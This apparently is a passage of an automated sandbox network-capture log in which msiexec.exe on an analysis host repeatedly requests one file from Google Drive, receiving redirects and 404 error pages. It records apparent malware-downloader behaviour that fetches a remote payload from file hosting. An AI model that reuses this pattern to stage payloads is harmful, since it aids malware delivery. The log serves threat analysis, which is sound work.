2025-01-11 02:09:12 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:12 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgTIA-DAD5ppr2Ew3ud8I1TasNDxcu57noXqm06gXL9frYRWPnD28npAj0goAJY_SHSrU5sQNLY Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:12 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-a_T3o6AIl95uqzSDAnQTKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:12 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 4d 4f 37 57 55 37 42 48 4d 54 39 32 5a 4a 42 5a 66 64 67 4a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vMO7WU7BHMT92ZJBZfdgJw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50006	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:13 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:13 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:13 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-qRs1tGL9m3otMb9Tn0cUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50007	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:14 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:14 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRz0BZ16If8xH-NhFrbrc1_6R2IGeavS6YAiLSlCAa1djZsm5nANo5CcPkX7yF2clHL Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:14 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-CxU-PktmcSjKlemqmuCGzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:14 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 5a 6d 2d 63 5a 6f 6f 4d 35 61 48 32 4a 57 62 35 35 52 6f 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mZm-cZooM5aH2JWb55RoOw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50008	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:15 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:15 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:15 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-AjW_XKAcpT_EkpzcVPy02g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50009	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:16 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:17 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgScc9gfCOBOp-bO5kD6x936NuwmP0KNjRIJuiPBHC2lwUlcJ1WdB4zKYdynfBJjj_xZ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:16 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-B8QuXgxITK5E3kt4cGdvzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:17 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 58 6c 38 4d 61 62 77 59 76 65 47 78 35 75 2d 32 47 4a 72 79 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LXl8MabwYveGx5u-2GJryg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50010	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:17 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:18 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:18 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-zRQ2-3UFjLpmhC7bbZXfeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50011	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:18 UTC	459	OUT	GET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:19 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQSvy0PWNCj3iEBmRNcR1lBwLRMjoa1-js4iGrdwzFfD35LRkARjDRNqMV_AyhXiiYRCvmwSBY Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:19 GMT Content-Security-Policy: script-src 'nonce-J-AJO7s5GtBWLiEISVe_Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 02:09:19 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 52 62 41 54 72 49 69 74 73 59 4d 35 77 74 36 57 79 69 34 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="aRbATrIitsYM5wt6Wyi4kQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50012	216.58.206.78	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:09:20 UTC	417	OUT	GET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU
2025-01-11 02:09:20 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 02:09:20 GMT Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-twheGSSx5th4lBeTd0endg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50013	142.250.181.225	443	988	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
